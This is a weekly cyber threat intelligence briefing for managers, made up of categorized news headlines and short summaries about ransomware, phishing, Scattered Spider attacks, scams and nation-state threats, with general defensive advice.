SafePay Ransomware: What You Need To Know | Fortra
The FBI warns that Scattered Spider is now targeting the airline sector
RansomHub Ransomware Attacking RDP Servers Using Mimikatz and Advanced IP Scanner Tools
Hawaiian Airlines Hacked as Aviation Sector Warned of Scattered Spider Attacks - SecurityWeek
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Nearly half of ransomware victims still pay out, says Sophos • The Register
Hunters International ransomware shuts down, releases free decryptors
Cl0p data exfiltration tool found vulnerable to RCE attacks • The Register
Ransomware Victims
Scattered Spider Taps CFO Account in 'Scorched Earth' Breach
Teardown: How Scattered Spider Hacked a Logistics Firm
Radix cyber attack: Swiss federal data at risk | Cybernews
M&S will be over the worst of cyber attack impact by August, says CEO | Reuters
The Same Cyber Hacking Group Breached 3 Airlines In 3 Weeks
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Humac Apple reseller targeted by Kraken ransomware | Cybernews
People warned to watch out for scam emails following cyber attack on M&S | The Standard
IdeaLab confirms data stolen in ransomware attack last year
Phishing & Email Based Attacks
71% of new hires click on phishing emails within 3 months - Help Net Security
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
ChatGPT creates phisher’s paradise by serving wrong URLs • The Register
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Criminals Sending QR Codes in Phishing, Malware Campaigns
Why 95% of phishing attacks go unreported in healthcare | TechRadar
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
US shuts down a string of North Korean IT worker scams • The Register
50 customers of French bank hit after insider helped SIM swap scammers
Scope, Scale of Spurious North Korean IT Workers Emerges
Fraud, Scams and Financial Crime
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
People warned to watch out for scam emails following cyber attack on M&S | The Standard
Patients, providers duped in records-and-payment scam • The Register
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Police dismantles investment fraud ring stealing €10 million
Glasgow council parking scam messages warning amid cyber incident | The National
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
FBI: Cyber criminals steal health data posing as fraud investigators
Scammers are tricking travelers into booking trips that don't exist - Help Net Security
Artificial Intelligence
90% aren't ready for AI attacks, are you? - Help Net Security
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Cyber criminals are abusing LLMs to help them with hacking activities | TechRadar
Are we securing AI like the rest of the cloud? - Help Net Security
AI cyber security readiness remains low globally as 90% of firms face elevated threat risks
Germany asks Google, Apple to remove DeepSeek AI from app stores
The Rise of Agentic AI: Uncovering Security Risks in AI Web Agents - Security Boulevard
AI on the Frontline: Global Firms Back Innovation, Brace for New Cyber Threats
How cyber criminals are weaponizing AI and what CISOs should do about it - Help Net Security
Cloudflare declares war on AI crawlers - and the stakes couldn't be higher | ZDNET
Malware
Criminals Sending QR Codes in Phishing, Malware Campaigns
GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
SMBs are being hit by malicious productivity tools – Zoom and ChatGPT spoofed by hackers | TechRadar
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Mobile
Germany asks Google, Apple to remove DeepSeek AI from app stores
50 customers of French bank hit after insider helped SIM swap scammers
Google hit with $314m fine for collecting data from idle Android phones without permission
Denial of Service/DoS/DDoS
Cloudflare blocks largest DDoS attack - here's how to protect yourself | ZDNET
Internet of Things – IoT
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Smart Tractors Vulnerable to Full Takeover
Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Data Breaches/Leaks
Qantas confirms cyber-attack exposed records of up to 6 million customers | Qantas | The Guardian
Ahold Delhaize Data Breach Impacts 2.2 Million People - SecurityWeek
Dark Web Vendors Shift to Third Parties, Supply Chains
FBI: Cyber criminals steal health data posing as fraud investigators
Kelly Benefits data breach has impacted 550,000 people
Growing cyber security apathy is a growing crisis - Tech Monitor
Esse Health says recent data breach affects over 263,000 patients
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Organised Crime & Criminal Actors
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Slavery, torture, human trafficking discovered at 53 Cambodian online scamming compounds | CyberScoop
US sanctions yet another Russian bulletproof hosting outfit • The Register
When hackers become hitmen • Graham Cluley
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US shuts down a string of North Korean IT worker scams • The Register
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Fraudsters behind €460 million crypto scam arrested in Spain - Help Net Security
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
Insider Risk and Insider Threats
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
50 customers of French bank hit after insider helped SIM swap scammers
Seven months for IT worker who trashed his work network • The Register
New hires, new targets: Why attackers love your onboarding process - Help Net Security
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Insurance
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Supply Chain and Third Parties
Dark Web Vendors Shift to Third Parties, Supply Chains
Third-party breaches double, creating ripple effects across industries - Help Net Security
Cloud/SaaS
Are we securing AI like the rest of the cloud? - Help Net Security
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Outages
Report highlights the cost of network failures for businesses ...
Internet outages are costing companies millions every month - Help Net Security
Encryption
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Linux and Open Source
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
Passwords, Credential Stuffing & Brute Force Attacks
Regulations, Fines and Legislation
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
UK eyes new laws over cable sabotage • The Register
Google hit with $314m fine for collecting data from idle Android phones without permission
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Patrick Ware Named Executive Director of US Cyber Command - SecurityWeek
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Models, Frameworks and Standards
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
Data Protection
Google hit with $314m fine for collecting data from idle Android phones without permission
Careers, Working in Cyber and Information Security
Why Cyber Security Should Rethink Inclusion For Neurodivergent People
Law Enforcement Action and Take Downs
Scam centres are spreading, and so is the human cost - Help Net Security
Seven months for IT worker who trashed his work network • The Register
Police dismantles investment fraud ring stealing €10 million
Europol shuts down Archetyp Market, longest-running dark web drug marketplace
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Ex-NATO hacker: In cyber, there’s no such thing a ceasefire • The Register
UK eyes new laws over cable sabotage • The Register
Cyber attacks by Iranian hackers may be incoming | Cybernews
Nation State Actors
China
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
UK eyes new laws over cable sabotage • The Register
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Germany asks Google, Apple to remove DeepSeek AI from app stores
Silver Fox Suspected in Taiwan Campaign Using DeepSeek
Russia
US sanctions yet another Russian bulletproof hosting outfit • The Register
UK eyes new laws over cable sabotage • The Register
Inside Russia’s secret digital war on NATO’s logistics lifeline to Ukraine - Euromaidan Press
Russia’s throttling of Cloudflare makes sites inaccessible
Calling Out Russia: France’s Shift on Public Attribution – War on the Rocks
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Iran
Iran-linked hackers resurface, threaten to release more stolen Trump emails | Cybernews
Iran-linked hackers may target US firms and critical infrastructure, US government warns
Iranian Cyber Threats Persist Despite Ceasefire, US Intelligence Warns - Infosecurity Magazine
The Evolving Iranian Cyber Threat | AFCEA International
North Korea
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
US steps up pursuit of hackers linked to North Korea’s nuclear programme
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Tools and Controls
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Internet outages are costing companies millions every month - Help Net Security
71% of new hires click on phishing emails within 3 months - Help Net Security
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Microsoft admits to Intune forgetfulness • The Register
Why AV is an overlooked cyber security risk | TechRadar
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
New hires, new targets: Why attackers love your onboarding process - Help Net Security
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
Let’s Encrypt ends certificate expiry emails to cut costs, boost privacy
How to Reduce Alert Fatigue in Cyber Security - Security Boulevard
Other News
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
Report highlights the cost of network failures for businesses ...
The Same Cyberhacking Group Breached 3 Airlines In 3 Weeks
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
International Criminal Court hit by cyber attack - iTnews
Swiss Regulator Pressures Swissquote Over Rising Cyber Crime Risks: Report
The Cyber Risk SMBs Can’t Afford To Ignore
Why every company needs a travel security program | CSO Online
Why UK cyber security has become so vulnerable - UKTN
Cyber attacks shake voters’ trust in elections, regardless of party
Retail, the industry hackers can’t resist | theHRD
Security Bite: How hackers can take over your Mac using Bluetooth - 9to5Mac
NTLM relay attacks are back from the dead - Help Net Security
Cornwall school forced to shut over cyber security issue - Cornwall Live
Cyber in the energy sector, from reaction to resilience | Professional Security Magazine
Germany seeks Israeli partnership on cyber defence, plans 'cyber dome' | Reuters
UK firms are 'sleepwalking' into smart building cyber threats | IT Pro
Cyber attacks are draining millions from the hospitality industry - Help Net Security
Two-thirds of EU bodies earn lowest security grades | Cybernews
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Vulnerability Management
11 Million Critical Vulnerabilities Exposed — Act Now
A third of threats left unremediated for 90 days - IT Security Guru
Initial Access Broker Self-Patches Zero Days as Turf Control
Vulnerability Debt: Putting a Price on What to Fix
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Vulnerabilities
Evidence Suggests Exploitation of CitrixBleed 2 Vulnerability - SecurityWeek
Thousands of Citrix NetScaler Instances Unpatched Against Exploited Vulnerabilities - SecurityWeek
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Google Issues Emergency Patch for Fourth Chrome Zero-Day of 2025 - Infosecurity Magazine
Critical Vulnerability in Anthropic's MCP Exposes Developer Machines to Remote Exploits
Millions of headphones vulnerable to Bluetooth hacks | Cybernews
Cisco warns that Unified CM has hardcoded root SSH credentials
Urgent Update: Microsoft Edge Fixes Actively Exploited Chromium Vulnerability
WordPress Plugin Flaw Exposes 600,000 Sites to File Deletion - Infosecurity Magazine
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Bluetooth flaws could let hackers spy through your microphone
CISA tells TeleMessage users to patch after active exploits • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 27 June 2025
Black Arrow Cyber Threat Intelligence Briefing 27 June 2025:
-Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
-New Hires More Likely to Fall for Phishing and Social Engineering Attacks
-BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
-More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
-Half of Security Pros Want GenAI Deployment Pause
-Cyber Attacks on Insurers Put CFOs on High Alert
-Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
-Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
-Police Alerts About New SMS “Blaster” Scams Used for Smishing
-Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
-Businesses Urged to Strengthen Cyber Defences amid Increase in Iran-Adjacent Attacks
-National Security Strategy 2025: Security for the British People in a Dangerous World
-How Geopolitical Tensions Are Shaping Cyber Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, our review of cyber security intelligence in the specialist and general media includes the latest ransomware report by Sophos, which shows that nearly half of organisations paid the ransom and over 40% of victims cited unrecognised security gaps as entry points for attackers. We discuss that popular entry points include employees, with phishing being particularly successful against newly hired employees and smaller organisations not training their staff. We also discuss the pressures of cyber security on key roles in the organisation: for CISOs, more than half are under pressure to keep breaches secret and many want a pause on AI deployment in their organisation; for CFOs, the challenge is to quantify and manage the financial risk of a breach.
Other articles describe how attackers are moving into the insurance, aviation and transportation sectors, while other attackers are using tactics including hijacking search results for major brands, or sending malicious text messages to phones that have been lured onto fake networks. Businesses are urged to address their supply chain risks and their wider security in the light of geopolitical risks from the Middle East, Russia, China and North Korea.
The recurring theme is the need for organisations to understand and proactively manage their risks through proportionate controls, and to establish and rehearse how to respond to an incident in order to remain resilient in the face of escalating threats.
Top Cyber Stories of the Last Week
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
Sophos’ latest global report shows nearly half of organisations hit by ransomware paid to regain access to their data, with a median payment of one million dollars. 53% negotiated lower sums than initially demanded, and the average recovery cost fell from $2.73 million to $1.53 million year on year. Over 40% of victims cited unrecognised security gaps as entry points for attackers, with lack of staff or expertise remaining a key weakness. However, more firms are halting attacks before data is encrypted, and faster recovery times suggest some organisations have improved readiness against ransomware threats.
New Hires More Likely to Fall for Phishing and Social Engineering Attacks
A recent study highlights that 71% of new hires click on phishing emails within their first three months, making them 44% more likely to fall victim than experienced staff. This increased risk stems from limited security training during onboarding and eagerness to please superiors, especially when emails appear to come from senior figures like the CEO or HR. Encouragingly, organisations that implemented tailored phishing simulations and behaviour-focused training saw phishing risk drop by 30%. Early, practical cyber security training is essential to equip new employees to recognise and report suspicious activity, strengthening overall organisational defences.
https://natlawreview.com/article/new-hires-more-likely-fall-phishing-social-engineering-attacks
BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
BT has warned that UK small and medium-sized enterprises face increasing cyber threats, with 42% of small and 67% of medium firms suffering an attack in the past year. Two in five SMEs, around two million businesses, have provided no cyber security training, leaving them vulnerable to phishing and to ransomware, which has more than doubled in a year. QR code scams have surged 1,400% over five years. The average cost of a serious breach for small firms is nearly £8,000, and many SMEs lack the resources or awareness to defend against emerging threats such as AI-driven attacks and account takeovers.
More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
A recent Bitdefender survey has revealed that 57% of cyber security professionals worldwide have been pressured to keep breaches secret, with Singapore and the US experiencing the highest rates. The study also highlights growing concerns over AI-driven cyber attacks, which 67% reported had increased and 51% cited as their top risk. Notably, a gap exists between executives’ high confidence in cyber resilience and mid-level managers’ lower assurance. Skills shortages, complex security tools, and challenges securing hybrid systems emerged as key obstacles, with nearly half saying the cyber security skills gap had worsened over the past year.
Half of Security Pros Want GenAI Deployment Pause
Research by security firm Cobalt reveals that nearly half of security professionals believe a pause on generative AI deployment is needed, as 36% feel adoption is outpacing their teams’ ability to manage risks. Three-quarters of practitioners consider generative AI their top IT risk, with concerns including exposure of sensitive data, manipulation of training information and model inaccuracies. Only 21% of serious vulnerabilities identified in generative AI tools are resolved. The report stresses that traditional web security measures like input validation remain essential, while highlighting that addressing prompt-based attacks on AI systems demands expert, adaptive testing.
https://www.infosecurity-magazine.com/news/half-security-pros-genai-pause/
Cyber Attacks on Insurers Put CFOs on High Alert
Recent cyber attacks on major insurers, including Aflac, have heightened concerns among chief financial officers about quantifying and managing the financial risks of data breaches in the insurance sector. Aflac detected unauthorised access to its network involving sensitive data such as health records and Social Security numbers. While operations remain unaffected and ransomware was not involved, the attack is linked to a sophisticated criminal group known for exploiting staff through social engineering, which uses deception to manipulate employees. Other insurers have faced similar breaches, signalling a rising trend of targeted attacks against the insurance industry that demand immediate attention from senior leaders.
https://fortune.com/2025/06/24/cyberattacks-insurers-aflac-cfo-high-alert/
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
Recent cyber attacks on UK retailers Marks & Spencer and Co-op, linked to the same criminal group Scattered Spider, have resulted in combined damages estimated between £270 million and £440 million. These incidents exploited social engineering, where attackers tricked IT help desks to gain access. The attacks are considered a significant event with deep impacts on both firms and their suppliers. Experts warn that Scattered Spider is now targeting the insurance, aviation and transportation sectors, urging heightened vigilance.
https://thehackernews.com/2025/06/scattered-spider-behind-cyberattacks-on.html
Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
Cyber criminals are hijacking search results for major brands like Netflix, Apple, and Bank of America, placing fake ads that lead victims to authentic-looking support pages showing fraudulent phone numbers. When users call these numbers, scammers posing as help-desk staff trick them into giving away personal or financial details, or granting remote access to their devices. This attack exploits weaknesses in website search functions and is difficult for browsers to detect. Organisations should raise awareness that legitimate support will never request sensitive information over the phone, and staff should be wary of unsolicited phone numbers in search results.
https://www.theregister.com/2025/06/20/netflix_apple_bofa_websites_hijacked/
Police Alerts About New SMS “Blaster” Scams Used for Smishing
UK Police have highlighted a rise in smishing attacks involving SMS blasters; these are radio devices that attract and connect to mobile phones in the area, and then send out text messages to those phones appearing to be from trusted organisations. A recent case saw a man jailed for sending thousands of scam messages from a car in London to steal personal information. Although some networks have blocked millions of scam texts, individuals are urged to avoid engaging with suspicious messages and report them to their mobile network provider. Disabling 2G on Android or filtering unknown senders on iPhones can further reduce exposure to these threats.
https://cybernews.com/news/police-alerts-about-new-sms-blaster-scams-used-for-smishing/
Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
A new report from SecurityScorecard shows that 5 in 6 organisations face heightened cyber security risks due to outdated supply chain defences. Third-party involvement in breaches has doubled to nearly 30%, yet fewer than half of firms monitor cyber security across even half of their extended supply chains. Over 70% have suffered at least one serious third-party incident in the past year. Experts warn that without integrated detection and incident response, organisations remain vulnerable to cascading impacts from supply chain cyber attacks.
Businesses Urged to Strengthen Cyber Defences Amid Increase in Iran-Adjacent Attacks
Cyber security experts have warned of a sharp rise in cyber attacks linked to Iran following the recent Israel-Iran conflict, with UK, US and EU businesses targeted. Attacks have included attempts to crash systems by overwhelming them with traffic, malicious software designed to delete data, and coordinated disinformation campaigns. UK Prime Minister Sir Keir Starmer described these cyber attacks as assaults on the UK itself, urging firms to urgently review and strengthen their cyber security. Experts caution that companies may be targeted simply for being connected to Western interests. Organisations are urged to strengthen security by promptly applying updates, using strong access controls, and preparing incident response plans. Experts stress the importance of employee awareness and real-time monitoring to counter sophisticated attack techniques aimed at disruption and data theft.
National Security Strategy 2025: Security for the British People in a Dangerous World
The UK’s National Security Strategy 2025 sets out the country’s response to an increasingly dangerous world, committing to spend 5% of GDP on national security by 2035. It highlights rising threats from Russia, China and Iran, and warns of growing cyber attacks undermining public services. The strategy stresses stronger borders, revitalising the defence industry, and aligning technology and economic resilience with security goals. It calls for a national effort to build resilience, improve cyber defences and ensure stability at home and abroad, emphasising that economic security and technological advantage are now central to protecting the British people.
How Geopolitical Tensions Are Shaping Cyber Warfare
Geopolitical tensions are fuelling a surge in cyber attacks as nation-state-backed groups target governments, finance, and infrastructure with increasing speed and sophistication. Iran focuses on disruption for political gain, North Korea pursues profit through theft, and Russia and China aim for long-term strategic advantage. Attackers often reuse old tools with new delivery methods, exploiting poor patching and weak user awareness. Artificial intelligence is compounding risks by enabling precise, large-scale attacks. To remain resilient, organisations must combine strong basics like patching and training with intelligence-led testing of defences tailored to the specific threats they face.
https://www.darkreading.com/vulnerabilities-threats/geopolitical-tensions-shape-cyber-warfare
Governance, Risk and Compliance
Comms Business - Almost 40 per cent of SMEs have no cyber security training, BT survey finds
BT says nearly half small businesses have suffered a cyber attack in the last year
Cyber security neglect issue for UK businesses? - The Recycler
More than half of cyber security professionals told to conceal breaches, survey claims
SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Cyber security Governance: A Guide for Businesses to Follow | TechTarget
Is Your CISO Ready to Flee? - Security Boulevard
After a hack many firms still say nothing, and that’s a problem - Help Net Security
Cyber attacks on insurers put CFOs on high alert | Fortune
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
How Customer Trust Can Shield Your Business In A Crisis
What is Risk Avoidance? | Definition from TechTarget
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Threats
Ransomware, Extortion and Destructive Attacks
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
UK ransomware costs significantly outpace other countries | Computer Weekly
Four REvil ransomware crooks walk free after admitting guilt • The Register
Ransomware threat actors today and how to thwart them | TechTarget
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Qilin Ransomware Adds "Call Lawyer" Feature to Pressure Victims for Larger Ransoms
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
Dire Wolf Ransomware Comes Out Snarling, Bites Verticals
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
Ransomware Victims
Major insurer hit by giant cyber attack | Insurance Business America
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
M&S cyber-attack boosted sales at Next, Zara and H&M
Patient death at London hospital linked to cyber attack on NHS – DataBreaches.Net
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
3 key takeaways from the Scattered Spider attacks on insurance firms
Whole Foods supplier UNFI restores core systems after cyber attack
Services disrupted as cyber attack hits Glasgow Council - UKTN
Phishing & Email Based Attacks
Report on New Hires and Phishing Susceptibility
Microsoft 365 'Direct Send' abused to send phishing as internal users
Other Social Engineering
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use US Banks to Fleece Americans — ProPublica
ClickFix attacks skyrocketing more than 500% - Help Net Security
New FileFix Method Emerges as a Threat Following 517% Rise in ClickFix Attacks
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Fraud, Scams and Financial Crime
Netflix, Apple, BofA sites hijacked with fake help numbers • The Register
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use U.S. Banks to Fleece Americans — ProPublica
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
UK cyber attacks set to continue amid ‘fraud pandemic’, security experts warn | The Independent
Amazon Prime Day Is Coming — How To Protect Yourself From Scammers
Artificial Intelligence
New AI Jailbreak Bypasses Guardrails With Ease - SecurityWeek
Most AI and SaaS apps are outside IT's control - Help Net Security
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
AI Is Behind 50% Of Spam — And Now It’s Hacking Your Accounts
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Navigating Generative AI's Expanding Capabilities and Evolving Risks
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Vulnerability in Public Repository Could Enable Hijacked LLM Responses | Security Magazine
And Now Malware That Tells AI to Ignore It?
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
We know GenAI is risky, so why aren't we fixing its flaws? - Help Net Security
US Army Blocks Air Force's AI Program Over Data Security Concerns | Air & Space Forces Magazine
Malware
Researchers discover first malware to exploit AI prompt injection
And Now Malware That Tells AI to Ignore It?
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Threat Actor Trojanizes Copy of SonicWall NetExtender App
Attackers Wield Signed ConnectWise Installers as Malware
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Prometei botnet activity has surged since March 2025
WinRAR patches bug letting malware launch from extracted archives
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
OneClik Malware Targets Energy Sector Using Microsoft ClickOnce and Golang Backdoors
Bots/Botnets
Prometei botnet activity has surged since March 2025
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
Mobile
Godfather Malware Targets 400+ Banking Apps Worldwide
SparkKitty Swipes Pics From iOS, Android Devices
What to do if your mobile phone account is hacked or number stolen | Mobile phones | The Guardian
Denial of Service/DoS/DDoS
Cloudflare blocked record-breaking 7.3 Tbps DDoS attack against a hosting provider
Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic - Ars Technica
Internet of Things – IoT
Typhoon-like gang slinging TLS certificate 'signed' by LAPD • The Register
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
DSIT identifies cyber security weaknesses in IoT devices | UKAuthority
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Data Breaches/Leaks
Supply Chain Attack Hits Swiss Banks | SC Media UK
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Oxford City Council suffers breach exposing two decades of data
Hacker 'IntelBroker' charged in US for global data theft breaches
Steel Giant Nucor Confirms Data Stolen in Cyber Attack
Cyber attacks at two Melbourne hospitals expose patient details on dark web
Hawaiian Airlines discloses cyber attack, flights not affected
Former US Army Sergeant admits he sold secrets to China • The Register
Advance Auto Parts data breach class action settlement
Organised Crime & Criminal Actors
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
Man pleads guilty to hacking networks to pitch security services
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
Money mule networks evolve into hierarchical, business-like criminal enterprises - Help Net Security
Africa Sees Surge in Cyber Crime as Law Enforcement Struggles
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Attackers Target Docker APIs in Stealthy Crypto Heist
Supply Chain and Third Parties
